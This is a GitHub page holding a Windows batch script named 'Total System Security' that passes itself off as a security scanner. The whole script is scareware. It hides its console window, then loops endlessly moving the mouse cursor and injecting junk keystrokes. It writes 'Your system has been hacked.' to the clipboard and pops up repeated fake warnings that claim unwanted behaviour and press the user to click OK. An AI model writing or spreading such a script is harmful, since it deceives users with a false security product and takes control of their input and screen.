-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathtotalsystemsecurity.bat
176 lines (173 loc) · 9.29 KB
/
totalsystemsecurity.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
# Configuration for Bat To Exe Converter Windows application
::[Bat To Exe Converter]
::
::fBE1pAF6MU+EWHreyHcjLQlHcD6LPW/6J70R7ezHy++UqVkSRN4rd5va1qeXM/QW51bhdoM/325DlcoAGxpKe1ytZwMxulJxr3eRMsqooQ74Z02a9Uo3Hit3lAM=
::fBE1pAF6MU+EWHreyHcjLQlHcD6LPW/6J70R7ezHy++UqVkSRN4rd5va1qeXM/QW51bhdoM/325DlcoAGxpKe1ytZwMxulJxr3eRMsqooQ74Z02a9Uo3Hitxn2aw
::fBE1pAF6MU+EWHreyHcjLQlHcD6LPW/6J70R7ezHy++UqVkSRN4rd5va1qeXM/QW51bhdoM/325DlcoAGxpKe1ytZwMxulJLtWuLec6fvG8=
::YAwzoRdxOk+EWAjk
::fBw5plQjdCyDJGyX8VAjFCFdTQDCHWO3A7EgzO3o5P6IsnEJW/Y+dJzCyaCLLfMW6VD2fII023tWj8oeCVVedx6ufTM9qmFM+G2GOKc=
::YAwzuBVtJxjWCl3EqQJgSA==
::ZR4luwNxJguZRRnk
::Yhs/ulQjdF+5
::cxAkpRVqdFKZSDk=
::cBs/ulQjdF+5
::ZR41oxFsdFKZSDk=
::eBoioBt6dFKZSDk=
::cRo6pxp7LAbNWATEpCI=
::egkzugNsPRvcWATEpSI=
::dAsiuh18IRvcCxnZtBJQ
::cRYluBh/LU+EWAjk
::YxY4rhs+aU+IeA==
::cxY6rQJ7JhzQF1fEqQJhZksaHErSXA==
::ZQ05rAF9IBncCkqN+0xwdVsGAlTMZSXqZg==
::ZQ05rAF9IAHYFVzEqQIEJw9VQESxJXiuA7hc2+34+viOtlR9
::eg0/rx1wNQPfEVWB+kM9LVsJDDCNKGq2RoYF+/z+4qq0p04IRusrYe8=
::fBEirQZwNQPfEVWB+kM9LVsJDDCNKGq2RoYF+/z+4qq0p04IRusrYe8=
::cRolqwZ3JBvQF1fEqQIEJw9VQESxJXiuA7hc2+34+viOtlRdUu0tOLjS1LCBN/Nz
::dhA7uBVwLU+EWG2L4EM8aChNXxCHMSuJA7YJ+uHv9qqgr081FK5/Tbz6ug==
::YQ03rBFzNR3SWATEwE0kKRcUfx2RKG63RoYZ6/3p5v6ewg==
::dhAmsQZ3MwfNWATEwE0kKRcUfx2RKG63RoYZ6/3p5v6e4n0IVu42e8/307eLLvMWpCU=
::ZQ0/vhVqMQ3MEVWAtB9wBjQ0
::Zg8zqx1/OA3MEVWAtB9wET5nLA==
::dhA7pRFwIByZRRnk
::Zh4grVQjdCyDJGyX8VAjFCFdTQDCHWO3A7EgzO3o5P6IsnEJW/Y+dJzCyaCLLfMW6VD2fII023tWj8oeCVVedx6ufTM5qGdM+GGdMqc=
::YB416Ek+ZW8=
::
::
::978f952a14a936cc963da21a135fa983
# Disables echoing the code (cmd.exe only)
@echo off
# Clears the whole screen
cls
# Sets the title of the command line window.
title Total System Security for Windows.
# Shows a particular message to the user.
echo Please wait while we scan your system, and other drives...
# Shows the contents of those drives on the console screen (cmd.exe only)
dir C:
dir D:
dir E:
dir F:
dir G:
dir H:
dir I:
dir J:
dir K:
dir L:
dir M:
dir N:
dir O:
dir B:
dir Q:
dir R:
dir X:
dir T:
dir U:
dir V:
dir W:
dir X:
dir Y:
dir Z:
# Hides the console window (Redirects into the background)
%extd% /hideself
# "start" is a list of commands
:start
# Sets the cursor to a specific dimention into the host screen.
%extd% /setcursor 100 100
%extd% /setcursor 200 200
%extd% /setcursor 300 200
%extd% /setcursor 600 400
%extd% /setcursor 100 100
%extd% /setcursor 200 200
%extd% /setcursor 300 200
%extd% /setcursor 600 400
%extd% /setcursor 100 100
%extd% /setcursor 200 200
%extd% /setcursor 300 200
%extd% /setcursor 600 400
%extd% /setcursor 100 100
%extd% /setcursor 200 200
%extd% /setcursor 300 200
%extd% /setcursor 600 400
%extd% /setcursor 100 100
%extd% /setcursor 200 200
%extd% /setcursor 300 200
%extd% /setcursor 600 400
%extd% /setcursor 100 100
%extd% /setcursor 200 200
%extd% /setcursor 300 200
%extd% /setcursor 600 400
%extd% /setcursor 100 100
%extd% /setcursor 200 200
%extd% /setcursor 300 200
%extd% /setcursor 600 400
%extd% /setcursor 100 100
%extd% /setcursor 200 200
%extd% /setcursor 300 200
%extd% /setcursor 600 400
# Copies some text into the clipboard.
%extd% /setclipboardtext "Total System Security needs your attention.."
%extd% /setclipboardtext "Your system has been hacked."
# Emulates keyboard clicks (Presses them on keyboard)
%extd% /sendkeys ttttttttttttttttt
%extd% /sendkeys xxxxxxxxxxxxxxxxx
%extd% /sendkeys yyyyyyyyyyyyyyyyy
%extd% /sendkeys iiiiiiiiiiiiiiiii
%extd% /sendkeys ttttttttttttttttt
%extd% /sendkeys xxxxxxxxxxxxxxxxx
%extd% /sendkeys yyyyyyyyyyyyyyyyy
%extd% /sendkeys iiiiiiiiiiiiiiiii
%extd% /sendkeys ttttttttttttttttt
%extd% /sendkeys xxxxxxxxxxxxxxxxx
%extd% /sendkeys yyyyyyyyyyyyyyyyy
%extd% /sendkeys iiiiiiiiiiiiiiiii
%extd% /sendkeys ttttttttttttttttt
%extd% /sendkeys xxxxxxxxxxxxxxxxx
%extd% /sendkeys yyyyyyyyyyyyyyyyy
%extd% /sendkeys iiiiiiiiiiiiiiiii
%extd% /sendkeys ttttttttttttttttt
%extd% /sendkeys xxxxxxxxxxxxxxxxx
%extd% /sendkeys yyyyyyyyyyyyyyyyy
%extd% /sendkeys iiiiiiiiiiiiiiiii
%extd% /sendkeys ttttttttttttttttt
%extd% /sendkeys xxxxxxxxxxxxxxxxx
%extd% /sendkeys yyyyyyyyyyyyyyyyy
%extd% /sendkeys iiiiiiiiiiiiiiiii
%extd% /sendkeys ttttttttttttttttt
%extd% /sendkeys xxxxxxxxxxxxxxxxx
%extd% /sendkeys yyyyyyyyyyyyyyyyy
%extd% /sendkeys iiiiiiiiiiiiiiiii
%extd% /sendkeys ttttttttttttttttt
%extd% /sendkeys xxxxxxxxxxxxxxxxx
%extd% /sendkeys yyyyyyyyyyyyyyyyy
%extd% /sendkeys iiiiiiiiiiiiiiiii
%extd% /sendkeys ttttttttttttttttt
%extd% /sendkeys xxxxxxxxxxxxxxxxx
%extd% /sendkeys yyyyyyyyyyyyyyyyy
%extd% /sendkeys iiiiiiiiiiiiiiiii
%extd% /sendkeys ttttttttttttttttt
%extd% /sendkeys xxxxxxxxxxxxxxxxx
%extd% /sendkeys yyyyyyyyyyyyyyyyy
%extd% /sendkeys iiiiiiiiiiiiiiiii
# Some unusual annoying messages,that must appear after the execution.
SystemTrayMessage.exe "Total System Security Has detected unwanted behaviour that ocurrs on your system, please update your version of Total System Security and try again" /T:"Total System Security"
%extd% /messagebox "Total System Security for Windows" "Total System Security needs to take some actions about your system, so they would be protected against malware if you would like to protect your system, please press OK button ,else we won't take any action to protect your system ,and your system files will become more vulnerable for online hackers and other illegal downloaders, please click OK to continue..." 16
SystemTrayMessage.exe "Total System Security Has detected unwanted behaviour that ocurrs on your system, please update your version of Total System Security and try again" /T:"Total System Security"
%extd% /messagebox "Total System Security for Windows" "Total System Security needs to take some actions about your system, so they would be protected against malware if you would like to protect your system, please press OK button ,else we won't take any action to protect your system ,and your system files will become more vulnerable for online hackers and other illegal downloaders, please click OK to continue..." 16
SystemTrayMessage.exe "Total System Security Has detected unwanted behaviour that ocurrs on your system, please update your version of Total System Security and try again" /T:"Total System Security"
%extd% /messagebox "Total System Security for Windows" "Total System Security needs to take some actions about your system, so they would be protected against malware if you would like to protect your system, please press OK button ,else we won't take any action to protect your system ,and your system files will become more vulnerable for online hackers and other illegal downloaders, please click OK to continue..." 16
SystemTrayMessage.exe "Total System Security Has detected unwanted behaviour that ocurrs on your system, please update your version of Total System Security and try again" /T:"Total System Security"
%extd% /messagebox "Total System Security for Windows" "Total System Security needs to take some actions about your system, so they would be protected against malware if you would like to protect your system, please press OK button ,else we won't take any action to protect your system ,and your system files will become more vulnerable for online hackers and other illegal downloaders, please click OK to continue..." 16
SystemTrayMessage.exe "Total System Security Has detected unwanted behaviour that ocurrs on your system, please update your version of Total System Security and try again" /T:"Total System Security"
%extd% /messagebox "Total System Security for Windows" "Total System Security needs to take some actions about your system, so they would be protected against malware if you would like to protect your system, please press OK button ,else we won't take any action to protect your system ,and your system files will become more vulnerable for online hackers and other illegal downloaders, please click OK to continue..." 16
SystemTrayMessage.exe "Total System Security Has detected unwanted behaviour that ocurrs on your system, please update your version of Total System Security and try again" /T:"Total System Security"
%extd% /messagebox "Total System Security for Windows" "Total System Security needs to take some actions about your system, so they would be protected against malware if you would like to protect your system, please press OK button ,else we won't take any action to protect your system ,and your system files will become more vulnerable for online hackers and other illegal downloaders, please click OK to continue..." 16
SystemTrayMessage.exe "Total System Security Has detected unwanted behaviour that ocurrs on your system, please update your version of Total System Security and try again" /T:"Total System Security"
%extd% /messagebox "Total System Security for Windows" "Total System Security needs to take some actions about your system, so they would be protected against malware if you would like to protect your system, please press OK button ,else we won't take any action to protect your system ,and your system files will become more vulnerable for online hackers and other illegal downloaders, please click OK to continue..." 16
# Shows you the output of the messagebox (=1)
echo %result%
# Wait for 2000 miliseconds (2 seconds)
%extd% /sleep 2000
# Re-executes the list of commands that is called "start"
goto start
# Re-executes them forever.